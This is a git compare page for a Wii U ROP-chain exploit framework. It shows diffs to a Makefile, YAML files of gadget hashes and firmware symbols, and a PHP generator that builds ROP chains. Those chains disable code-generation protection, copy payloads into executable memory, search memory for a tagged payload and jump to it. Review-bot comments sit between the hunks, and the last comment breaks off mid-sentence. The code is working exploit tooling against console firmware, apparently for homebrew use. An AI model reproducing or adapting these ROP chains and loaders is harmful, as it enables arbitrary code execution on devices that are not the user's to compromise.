Compare commits
15 Commits
|
8d5b8ab0b6 | ||
|
0a24047530 | ||
|
b6909c596b | ||
|
254d89a32c | ||
|
4b56cb4cd0 | ||
|
439b34bc7e | ||
|
1898ab431f | ||
|
9c7073fa3c | ||
|
0ec1c42452 | ||
|
7896f5733e | ||
|
c4affe4294 | ||
|
380fec3ef3 | ||
|
869a2de049 | ||
|
ca5121d198 | ||
|
747c771862 |
2
.gitignore
vendored
2
.gitignore
vendored
|
@ -5,3 +5,5 @@ wiiuhaxx_loader.elf
|
|||
wiiuhaxx_loader.bin
|
||||
tmp/
|
||||
wiiuhaxx_rop_sysver_*
|
||||
wiiuhaxx_searcher.bin
|
||||
wiiuhaxx_searcher.elf
|
||||
|
|
59
Makefile
59
Makefile
|
@ -22,35 +22,54 @@ export READELF := $(PREFIX)readelf
|
|||
export OBJCOPY := $(PREFIX)objcopy
|
||||
DEFINES :=
|
||||
|
||||
COREINIT_PATH := tmp/$(FIRMWARE)/000500101000400A/code/coreinit.rpl
|
||||
COREINIT_PATH_ELF := $(COREINIT_PATH).elf
|
||||
|
||||
ifeq ($(OS),Windows_NT)
|
||||
exe_ext := .exe
|
||||
else
|
||||
exe_ext :=
|
||||
endif
|
||||
COREINIT_CONFIG_PATH := coreinit.yml
|
||||
GX2_CONFIG_PATH := gx2.yml
|
||||
COREINIT_PATH := tmp/$(FIRMWARE)/coreinit.rpl
|
||||
GX2_PATH := tmp/$(FIRMWARE)/gx2.rpl
|
||||
TARGET_FILENAME := wiiuhaxx_rop_sysver_$(FIRMWARE).php
|
||||
GADGET_FINDER_PATH := bin/rpxgadgetfinder.jar
|
||||
|
||||
all: loader locateall
|
||||
|
||||
loader:
|
||||
loader: wiiuhaxx_loader.bin wiiuhaxx_searcher.bin
|
||||
|
||||
wiiuhaxx_loader.bin: wiiuhaxx_loader.s
|
||||
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_loader.elf wiiuhaxx_loader.s
|
||||
$(OBJCOPY) -O binary wiiuhaxx_loader.elf wiiuhaxx_loader.bin
|
||||
|
||||
wiiuhaxx_searcher.bin: wiiuhaxx_searcher.s
|
||||
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_searcher.elf wiiuhaxx_searcher.s
|
||||
$(OBJCOPY) -O binary wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin
|
||||
|
||||
locateall: locate532 locate550
|
||||
|
||||
|
||||
locate532:
|
||||
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 11464 -out tmp/532
|
||||
make locatespecific FIRMWARE=532 TEXTADDRESS=0x0101c400
|
||||
|
||||
make locatespecific FIRMWARE=532 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
|
||||
|
||||
locate550:
|
||||
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 15702 -out tmp/550
|
||||
make locatespecific FIRMWARE=550 TEXTADDRESS=0x0101c400
|
||||
|
||||
locatespecific:
|
||||
./bin/rpl2elf$(exe_ext) $(COREINIT_PATH) $(COREINIT_PATH_ELF) > /dev/null
|
||||
sh ./wiiuhaxx_locaterop.sh $(COREINIT_PATH) $(TEXTADDRESS) $(exe_ext) > wiiuhaxx_rop_sysver_$(FIRMWARE).php
|
||||
make locatespecific FIRMWARE=550 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
|
||||
|
||||
checkrpl: $(COREINIT_PATH) $(GX2_PATH)
|
||||
|
||||
$(COREINIT_PATH):
|
||||
if [ -a $(COREINIT_PATH) ]; then $(error missing $(COREINIT_PATH) for FW $(FIRMWARE)); fi;
|
||||
|
||||
$(GX2_PATH):
|
||||
if [ -a $(GX2_PATH) ]; then $(error missing $(GX2_PATH) for FW $(FIRMWARE)); fi;
|
||||
|
||||
$(CONFIG_FILENAME):
|
||||
if [ -a $(CONFIG_FILENAME) ]; then $(error missing $(CONFIG_FILENAME)); fi;
|
||||
|
||||
$(GADGET_FINDER_PATH):
|
||||
if [ -a $(GADGET_FINDER_PATH) ]; then $(error missing $(GADGET_FINDER_PATH)); fi;
|
||||
|
||||
locatespecific: checkrpl $(GADGET_FINDER_PATH) $(CONFIG_FILENAME)
|
||||
@echo "Finding symbols for FW $(FIRMWARE)"
|
||||
@echo "<?php" > $(TARGET_FILENAME)
|
||||
@java -jar $(GADGET_FINDER_PATH) -cin $(COREINIT_CONFIG_PATH) -bin $(COREINIT_PATH) -aoff -$(ADDRESS_OFFSET_COREINIT) >> $(TARGET_FILENAME)
|
||||
@java -jar $(GADGET_FINDER_PATH) -cin $(GX2_CONFIG_PATH) -bin $(GX2_PATH) -aoff -$(ADDRESS_OFFSET_GX2) >> $(TARGET_FILENAME)
|
||||
@echo "?>" >> $(TARGET_FILENAME)
|
||||
|
||||
clean:
|
||||
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_rop_sysver_* tmp
|
||||
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin wiiuhaxx_rop_sysver_*
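Review bot: The guard recipes under `$(COREINIT_PATH):`, `$(GX2_PATH):`, `$(CONFIG_FILENAME):` and `$(GADGET_FINDER_PATH):` do not behave the way the shell `if` suggests: `$(error …)` is a make function expanded while the recipe is being prepared, so it aborts unconditionally whenever the target file is absent, and the `[ -a … ]` test (which checks for presence, the opposite of "missing") never runs; each recipe can simply be `$(error missing $@ for FW $(FIRMWARE))`, or a real shell check such as `@test -f $@ || { echo "missing $@ for FW $(FIRMWARE)" >&2; exit 1; }`. `$(CONFIG_FILENAME)` is not assigned anywhere in this hunk (the first 21 lines of the Makefile are not shown), so as far as the visible code goes that rule and the `locatespecific` prerequisite expand to nothing and the yml files are never checked; `locatespecific` should depend on `$(COREINIT_CONFIG_PATH) $(GX2_CONFIG_PATH)` instead. Because the gadget addresses written into `$(TARGET_FILENAME)` are derived directly from whatever `tmp/$(FIRMWARE)/*.rpl` the user dropped in, a `sha256sum -c` of the expected rpl digests before invoking the gadget finder would catch a wrong-version or tampered system library rather than silently producing a ROP file with bad offsets. Finally, none of `all loader locateall locate532 locate550 locatespecific checkrpl clean` are declared `.PHONY`, and `locate532`/`locate550` call a literal `make` instead of `$(MAKE)`, so flags and the jobserver do not propagate to the recursive invocation.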
|
||||
|
||||
|
|
12
README.md
12
README.md
|
@ -1,15 +1,16 @@
|
|||
# README
|
||||
|
||||
This fork is supposed a common base for Wii U ROP-chains.
|
||||
This fork is supposed to be a common base for Wii U ROP-chains.
|
||||
|
||||
## Building
|
||||
Before using the ROP-chain, some files need to be compiled/generated, you can do it with `make`.
|
||||
|
||||
The makefile expects some binaries/files.
|
||||
- `bin/ropgadget_patternfinder(.exe)` [Download](https://github.com/wiiu-env/ropgadget_patternfinder/releases)
|
||||
- `bin/rpl2elf(.exe)` [Download](https://github.com/wiiu-env/rpl2elf/releases)
|
||||
- `bin/FileDownloader.jar` [Download](https://github.com/wiiu-env/NUSFileDownloader/releases)
|
||||
- `common.key` containing the retail Wii U common key (in binary form, 16 bytes).
|
||||
- `bin/rpxgadgetfinder.jar` [Download](https://github.com/wiiu-env/RPXGadgetFinder/releases) (requires Java 11(!))
|
||||
- `tmp/532/coreinit.rpl` from 00050010-1000400A OSv10 v11464
|
||||
- `tmp/532/gx2.rpl` from 00050010-1000400A OSv10 v11464
|
||||
- `tmp/550/coreinit.rpl` from 00050010-1000400A OSv10 v15702
|
||||
- `tmp/550/gx2.rpl` from 00050010-1000400A OSv10 v15702
|
||||
|
||||
When you have all needed files, you can use `make`.
|
||||
|
||||
|
@ -106,6 +107,7 @@ For example:
|
|||
|
||||
$wiiuhaxxcfg_payloadfilepath = "<filepath for actual payload, such as wiiuhax_payload.bin, or for example: {projectdir}/bin/code550.bin>";//Remember that this is just an example, you can programmatically select the payload path by checking the request URL/etc if you want as well.
|
||||
$wiiuhaxxcfg_loaderfilepath = "<filepath for wiiuhaxx_loader.bin>";
|
||||
$wiiuhaxxcfg_searchpayloadfilepath = "<filepath for wiiuhaxx_searcher.bin>";
|
||||
|
||||
?>
|
||||
```
|
||||
|
|
74
coreinit.yml
Normal file
74
coreinit.yml
Normal file
|
@ -0,0 +1,74 @@
|
|||
!!de.orb.wiiu.rpxgadgetfinder.SymbolList
|
||||
symbols:
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: memcpy, out: $ROP_memcpy}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: DCFlushRange, out: $ROP_DCFlushRange}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: ICInvalidateRange, out: $ROP_ICInvalidateRange}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSwitchSecCodeGenMode, out: $ROP_OSSwitchSecCodeGenMode}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSCodegenCopy, out: $ROP_OSCodegenCopy}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCodegenVirtAddrRange, out: $ROP_OSGetCodegenVirtAddrRange}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCoreId, out: $ROP_OSGetCoreId}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCurrentThread, out: $ROP_OSGetCurrentThread}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSetThreadAffinity, out: $ROP_OSSetThreadAffinity}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSYieldThread, out: $ROP_OSYieldThread}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSFatal, out: $ROP_OSFatal}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: _Exit, out: $ROP_Exit}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenFlipBuffersEx, out: $ROP_OSScreenFlipBuffersEx}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenClearBufferEx, out: $ROP_OSScreenClearBufferEx}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_Acquire, out: $ROP_OSDynLoad_Acquire}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_FindExport, out: $ROP_OSDynLoad_FindExport}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: __os_snprintf, out: $ROP_os_snprintf}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
yHAg7FCY0T7dPuDQ0BMToKXwp5N/NsD19OlQMWWuM/s=
|
||||
out: $ROP_POPJUMPLR_STACK12
|
||||
size: 16
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
3s/zyode/BqcPQrHYY8++j0zylm9P9YCp0fTRpvVwAA=
|
||||
out: $ROP_POPJUMPLR_STACK20
|
||||
size: 16
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
UwYkiCHAcqnPXHHJRpFx4XzSlm9m/H1hLOec/41dEko=
|
||||
out: $ROP_CALLFUNC
|
||||
size: 52
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
9OdgU6ZcVx8rO4xsbd6XPJX4ibzPCiLrlknLx4EMjpg=
|
||||
out: $ROP_CALLR28_POP_R28_TO_R31
|
||||
size: 44
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
R0G4Y63PdC+JKMSFo588yGKUadHdzPnmjJ3RwlNB8JE=
|
||||
out: $ROP_POP_R28R29R30R31
|
||||
size: 32
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
lylzvoB06SsPEPxfu6rvbCjikF+ZAHZUzXNaX9aZM/w=
|
||||
out: $ROP_POP_R27
|
||||
size: 20
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
b18R/cRB3e+PIYnLyQBlF8SRf89ul1y4y+sjc7+OjKI=
|
||||
out: $ROP_POP_R24_TO_R31
|
||||
size: 20
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
5gL2bPiq3E1efbB0rZuPv6QZD4YqghXPJvcHpJypUHA=
|
||||
out: $ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM
|
||||
size: 40
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
Xh+0gQ/2+4a7Uz8gUDBt5uA+CUUIh99ssixthRHD4mc=
|
||||
out: $ROP_SETR3TOR31_POP_R31
|
||||
size: 24
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
XO0YJxjoIEwpnqH44pWEGgMl7kk4k7hgU952LMDu+0g=
|
||||
out: $ROP_Register
|
||||
size: 12
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
xFfDPPQrAMLgC5bixrCXhIZDvBcui9yfDn2XToM4YLY=
|
||||
out: $ROP_CopyToSaveArea
|
||||
size: 12
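Review bot: The `!!de.orb.wiiu.rpxgadgetfinder.*` tags look like SnakeYAML global class tags, which implies the gadget finder loads this file with a constructor that instantiates whatever Java class a tag names; that is acceptable for a file tracked in the repo, but it means `coreinit.yml` must be treated as code rather than data — whoever can edit it, or point `COREINIT_CONFIG_PATH` at another file, controls what the jar instantiates — so the loader should be restricted to the two expected symbol types if the tool allows it, and a comment at the top of the file saying so would stop someone from accepting a downloaded yml as a harmless config. Each `GadgetSymbol` entry is an opaque sha256 over `size` bytes (the same digests the removed `wiiuhaxx_locaterop_script` passed as `--patterndata`), with nothing indicating which instruction sequence it matches or what stack layout it consumes, so a reader cannot verify, for example, what `$ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM` expects on the stack or regenerate the hash for a new firmware. A `#` comment per entry naming the matched instruction sequence and the stack slots it pops would make the hashes reviewable; the YAML format has comment syntax, so this costs nothing at load time.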
|
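--- a/gx2.yml
+++ b/gx2.yml
@@ -0,0 +1,5 @@
+!!de.orb.wiiu.rpxgadgetfinder.SymbolList
+symbols:
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Init, out: $ROP_GX2Init}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Flush, out: $ROP_GX2Flush}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2DirectCallDisplayList, out: $ROP_GX2DirectCallDisplayList}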
|
@ -2,7 +2,13 @@
|
|||
|
||||
require_once("wiiuhaxx_common_cfg.php");
|
||||
|
||||
if(!isset($wiiuhaxxcfg_payloadfilepath) || !isset($wiiuhaxxcfg_loaderfilepath))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
|
||||
if(!isset($ropchainselect))$ropchainselect = -1;
|
||||
if($ropchainselect == -1)
|
||||
{
|
||||
$ropchainselect = 1;
|
||||
}
|
||||
|
||||
if(!isset($wiiuhaxxcfg_payloadfilepath) || (($ropchainselect < 4) && !isset($wiiuhaxxcfg_loaderfilepath)))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
|
||||
|
||||
if(!isset($sysver))$sysver = -1;
|
||||
|
||||
|
@ -29,16 +35,6 @@ if($filesysver == 540)$filesysver = 532;
|
|||
|
||||
require_once("wiiuhaxx_rop_sysver_$filesysver.php");
|
||||
|
||||
if(!isset($ROPCHAIN_JS_VAR)) $ROPCHAIN_JS_VAR = false;
|
||||
if(!isset($USE_FIXED_PAYLOAD_LEGNTH)) $USE_FIXED_PAYLOAD_LEGNTH = -1;
|
||||
|
||||
if(!isset($payload_size)) $payload_size = 0x20000; //Doesn't really matter if the actual payload data size in memory is smaller than this or not.
|
||||
|
||||
if(!isset($ropchainselect))$ropchainselect = -1;
|
||||
if($ropchainselect == -1)
|
||||
{
|
||||
$ropchainselect = 1;
|
||||
}
|
||||
|
||||
if(!isset($generatebinrop))$generatebinrop = 0;
|
||||
|
||||
|
@ -95,14 +91,10 @@ function genu32_unicode_jswrap($value)
|
|||
}
|
||||
function ropchain_appendu32($val)
|
||||
{
|
||||
global $ROPCHAIN, $generatebinrop, $ROPCHAIN_JS_VAR;
|
||||
global $ROPCHAIN, $generatebinrop;
|
||||
if($generatebinrop==0)
|
||||
{
|
||||
if($ROPCHAIN_JS_VAR){
|
||||
$ROPCHAIN.= genu32_array($val);
|
||||
}else{
|
||||
$ROPCHAIN.= genu32_unicode($val);
|
||||
}
|
||||
$ROPCHAIN.= genu32_unicode($val);
|
||||
}
|
||||
else
|
||||
{
|
||||
|
@ -112,44 +104,63 @@ function ropchain_appendu32($val)
|
|||
|
||||
function generate_ropchain()
|
||||
{
|
||||
global $ROPCHAIN, $generatebinrop, $ropchainselect, $ROPCHAIN_JS_VAR;
|
||||
global $ROPCHAIN, $generatebinrop, $ropchainselect;
|
||||
|
||||
$ROPCHAIN = "";
|
||||
|
||||
if($generatebinrop==0 && !$ROPCHAIN_JS_VAR)$ROPCHAIN .= "\"";
|
||||
if($generatebinrop==0 && $ROPCHAIN_JS_VAR)$ROPCHAIN .= "var realROPChain = [";
|
||||
if($generatebinrop==0)$ROPCHAIN .= "\"";
|
||||
|
||||
if($ropchainselect==1)
|
||||
{
|
||||
generateropchain_type1();
|
||||
}
|
||||
else if ($ropchainselect==2)
|
||||
{
|
||||
generateropchain_type2();
|
||||
}
|
||||
else if ($ropchainselect==3)
|
||||
{
|
||||
generateropchain_type3();
|
||||
}
|
||||
else if ($ropchainselect==4)
|
||||
{
|
||||
generateropchain_type4();
|
||||
}
|
||||
|
||||
if($generatebinrop==0 && !$ROPCHAIN_JS_VAR)$ROPCHAIN.= "\"";
|
||||
if($generatebinrop==0 && $ROPCHAIN_JS_VAR)$ROPCHAIN .= "];";
|
||||
if($generatebinrop==0)$ROPCHAIN.= "\"";
|
||||
}
|
||||
|
||||
function wiiuhaxx_generatepayload()
|
||||
{
|
||||
global $wiiuhaxxcfg_payloadfilepath, $wiiuhaxxcfg_loaderfilepath, $USE_FIXED_PAYLOAD_LEGNTH;
|
||||
function wiiuhaxx_loadfilebinary($pathToFile){
|
||||
$payload = file_get_contents($pathToFile);
|
||||
if($payload === FALSE || strlen($payload) < 4){
|
||||
die("-1: Failed to load: ". $pathToFile);
|
||||
}
|
||||
|
||||
$actual_payload = file_get_contents($wiiuhaxxcfg_payloadfilepath);
|
||||
if($actual_payload === FALSE || strlen($actual_payload) < 4)return FALSE;
|
||||
$len = strlen($payload);
|
||||
|
||||
while($len & 0x3){
|
||||
$payload.= pack("C*", 0x00);
|
||||
$len = strlen($payload);
|
||||
}
|
||||
return $payload;
|
||||
}
|
||||
|
||||
function wiiuhaxx_generatepayload(){
|
||||
global $wiiuhaxxcfg_payloadfilepath;
|
||||
return wiiuhaxx_loadfilebinary($wiiuhaxxcfg_payloadfilepath);
|
||||
}
|
||||
|
||||
function wiiuhaxx_generatepayloadwithloader()
|
||||
{
|
||||
global $wiiuhaxxcfg_payloadfilepath, $wiiuhaxxcfg_loaderfilepath;
|
||||
|
||||
$actual_payload = wiiuhaxx_loadfilebinary($wiiuhaxxcfg_payloadfilepath);
|
||||
|
||||
$loader = file_get_contents($wiiuhaxxcfg_loaderfilepath);
|
||||
if($loader === FALSE || strlen($loader) < 4)return FALSE;
|
||||
|
||||
if($USE_FIXED_PAYLOAD_LEGNTH != -1){
|
||||
$len = USE_FIXED_PAYLOAD_LEGNTH;
|
||||
}else{
|
||||
$len = strlen($actual_payload);
|
||||
}
|
||||
|
||||
while($len & 0x3)//The actual payload size must be 4-byte aligned.
|
||||
{
|
||||
$actual_payload.= pack("C*", 0x00);
|
||||
$len = strlen($actual_payload);
|
||||
}
|
||||
|
||||
$len = strlen($actual_payload);
|
||||
|
||||
$loader .= pack("N*", $len);
|
||||
|
||||
return $loader . $actual_payload;
|
||||
|
@ -350,6 +361,9 @@ function ropgen_copycodebin_to_codegen($codegen_addr, $codebin_addr, $codebin_si
|
|||
//ropgen_OSGetCodegenVirtAddrRange($ROPHEAP+0x200, $ROPHEAP+0x10+4);
|
||||
//ropgen_callfunc(0x103769C, 0x0, 0x0, 0x0, 0x0, 0x0);//5.5.0 getcodegeninfo syscall
|
||||
//ropgen_display_u32(0);
|
||||
|
||||
ropgen_DCFlushRange($codebin_addr, $codebin_size);
|
||||
ropgen_ICInvalidateRange($codebin_addr, $codebin_size);
|
||||
|
||||
ropgen_OSSwitchSecCodeGenMode(0);
|
||||
ropgen_memcpy($codegen_addr, $codebin_addr, $codebin_size);
|
||||
|
@ -387,6 +401,7 @@ function ropgen_display_u32($skip_printval_initialization)//This prints the valu
|
|||
|
||||
ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31);//snprintf(outstr, "%x", 0x40, <value of r3 at the time of ropgen_display_u32() entry>);
|
||||
|
||||
$r28 = 0; // This may be wrong, but without this line we get a warning.
|
||||
ropchain_appendu32($r28);//r28
|
||||
ropchain_appendu32(0x0);//r29
|
||||
ropchain_appendu32(0x0);//r30
|
||||
|
@ -419,12 +434,20 @@ function ropgen_switchto_core1()
|
|||
ropchain_appendu32(0x0);
|
||||
}
|
||||
|
||||
function ropgen_writerop_toAddress($path, $dstaddr){
|
||||
$payload = wiiuhaxx_loadfilebinary($path);
|
||||
$len = strlen($payload);
|
||||
for($i = 0; $i < $len; $i +=4) {
|
||||
ropgen_writeword_tomem(hexdec (bin2hex (substr($payload, $i, 4))),$dstaddr + $i);
|
||||
}
|
||||
}
|
||||
|
||||
function generateropchain_type1()
|
||||
{
|
||||
global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP, $ROPCHAIN, $payload_size;
|
||||
global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP, $ROPCHAIN;
|
||||
|
||||
//$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
//$payload_srcaddr must be defined by the code including this .php.
|
||||
|
||||
//ropgen_colorfill(0x1, 0xff, 0xff, 0x0, 0xff);//Color-fill the gamepad screen with yellow.
|
||||
|
@ -432,7 +455,7 @@ function generateropchain_type1()
|
|||
//ropchain_appendu32(0x80808080);//Trigger a crash.
|
||||
|
||||
//ropgen_OSFatal($codepayload_srcaddr);//OSFatal(<data from the haxx>);
|
||||
|
||||
|
||||
ropgen_switchto_core1();//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1.
|
||||
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size);
|
||||
|
@ -460,4 +483,110 @@ function generateropchain_type1()
|
|||
ropchain_appendu32($codegen_addr);
|
||||
}
|
||||
|
||||
// The rop may get quite big here.
|
||||
function generateropchain_type2(){
|
||||
global $payload_srcaddr, $ROPHEAP, $ROPCHAIN, $wiiuhaxxcfg_payloadfilepath;
|
||||
|
||||
$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
//$payload_srcaddr must be defined by the code including this .php.
|
||||
|
||||
// Write payload from file to
|
||||
ropgen_writerop_toAddress($wiiuhaxxcfg_payloadfilepath, $payload_srcaddr);
|
||||
|
||||
//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1.
|
||||
ropgen_switchto_core1();
|
||||
|
||||
// Copy to codegen
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size);
|
||||
|
||||
// Go!
|
||||
ropchain_appendu32($codegen_addr);
|
||||
}
|
||||
|
||||
// Print payload_srcaddr.
|
||||
function generateropchain_type3(){
|
||||
global $payload_srcaddr;
|
||||
ropgen_OSFatal($payload_srcaddr);
|
||||
}
|
||||
|
||||
function ropgen_GX2DirectCallDisplayList($addr,$size){
|
||||
global $ROP_GX2DirectCallDisplayList;
|
||||
ropgen_callfunc($ROP_GX2DirectCallDisplayList, $addr, $size, 0x0, 0x0, 0x0);
|
||||
}
|
||||
|
||||
function ropgen_GX2Flush(){
|
||||
global $ROP_GX2Flush;
|
||||
ropgen_callfunc($ROP_GX2Flush, 0x0, 0x0, 0x0, 0x0, 0x0);
|
||||
}
|
||||
|
||||
function ropgen_Register($namePtr,$nameSize,$arg3,$arg4){
|
||||
global $ROP_Register;
|
||||
ropgen_callfunc($ROP_Register, $namePtr, $nameSize, $arg3, $arg4, 0x0);
|
||||
}
|
||||
|
||||
function ropgen_CopyToSaveArea($namePtr,$nameSize,$srcAddr,$srcLen){
|
||||
global $ROP_CopyToSaveArea;
|
||||
ropgen_callfunc($ROP_CopyToSaveArea, $namePtr, $nameSize, $srcAddr, $srcLen, 0x0);
|
||||
}
|
||||
|
||||
function generateropchain_type4()
|
||||
{
|
||||
global $ROP_OSFatal, $ROP_Exit, $ROPHEAP, $ROPCHAIN, $payload_tmp_address, $wiiuhaxxcfg_searchpayloadfilepath, $payload_start_search,$valid_payload_dst_address, $payload_search_for;
|
||||
|
||||
$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
|
||||
// $payload_tmp_address where to store payload from ROP.
|
||||
if(!isset($payload_tmp_address)){
|
||||
die('please set $payload_tmp_address to a valid, unused, tmp address.');
|
||||
}
|
||||
// $payload_start_search. start address of the payload search.
|
||||
if(!isset($payload_start_search)){
|
||||
die('please set $payload_start_search. This should contain the start address of the payload search');
|
||||
}
|
||||
//$valid_payload_dst_address = 0x1D500000;
|
||||
if(!isset($valid_payload_dst_address)){
|
||||
die('please set $valid_payload_dst_address. This should address a region of 0x20000 bytes where the found payload it copied to.');
|
||||
}
|
||||
//$payload_search_for
|
||||
if(!isset($payload_search_for)){
|
||||
die('please set $payload_search_for. This should contain a unqiue u32 value that is placed right before the payload.');
|
||||
}
|
||||
|
||||
// size
|
||||
$search_payload_length = strlen(wiiuhaxx_loadfilebinary($wiiuhaxxcfg_searchpayloadfilepath));
|
||||
|
||||
ropgen_switchto_core1();//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1.
|
||||
|
||||
// Write our search payload somewhere into mem
|
||||
ropgen_writerop_toAddress($wiiuhaxxcfg_searchpayloadfilepath,$payload_tmp_address);
|
||||
|
||||
// Copy it to codegen
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $payload_tmp_address, $search_payload_length);
|
||||
|
||||
// Set up some parameters
|
||||
$regs = array();
|
||||
$regs[24 - 24] = $ROP_OSFatal;//r24
|
||||
$regs[25 - 24] = $ROP_Exit;//r25
|
||||
$regs[26 - 24] = $payload_size;//r26 sizeToCopy
|
||||
$regs[27 - 24] = $payload_search_for - 0x04;// r27 SearchFor. substract 0x4 so we didn't find THIS accidentally.
|
||||
$regs[28 - 24] = $payload_start_search; //r28 start of search
|
||||
$regs[29 - 24] = $valid_payload_dst_address ; //r29 target address
|
||||
$regs[30 - 24] = 0x8;//r30 The payload can do this at entry to determine the start address of the code-loading ROP-chain: r1+= r30. r1+4 after that is where the jump-addr should be loaded from. The above r29 is a ptr to the input data used for payload loading.
|
||||
$regs[31 - 24] = $ROPHEAP;//r31
|
||||
ropgen_pop_r24_to_r31($regs);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
|
||||
|
||||
// And run it!
|
||||
ropchain_appendu32($codegen_addr);//Jump to the codegen area where the payload was written.
|
||||
|
||||
// We need this, not sure why tbh.
|
||||
ropchain_appendu32(0x0);
|
||||
|
||||
// On success, we should now have our actual payload @valid_payload_dst_address. Lets copy it to codegen.
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $valid_payload_dst_address, $payload_size);
|
||||
// and run it!
|
||||
ropchain_appendu32($codegen_addr);
|
||||
}
|
||||
|
||||
?>
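Review bot: In hunk `@ -112,44 +104,63 @@` of this PHP file (its file header is not shown on this page) the new `wiiuhaxx_loadfilebinary` answers a missing or short file with `die("-1: Failed to load: ". $pathToFile)`, which writes the server-side filesystem path of the payload into the page served to the console's browser and drops the `return FALSE` contract the old `wiiuhaxx_generatepayload` had; the visible callers (`wiiuhaxx_generatepayload`, `ropgen_writerop_toAddress`, `generateropchain_type4`) never test for FALSE, so aborting is the intended behaviour, but the path should stay out of the response: `error_log("wiiuhaxx: failed to load " . $pathToFile); die("-1: Failed to load payload file.");`. The same hunk leaves `wiiuhaxx_generatepayloadwithloader` returning FALSE on a bad loader while a bad payload now dies, 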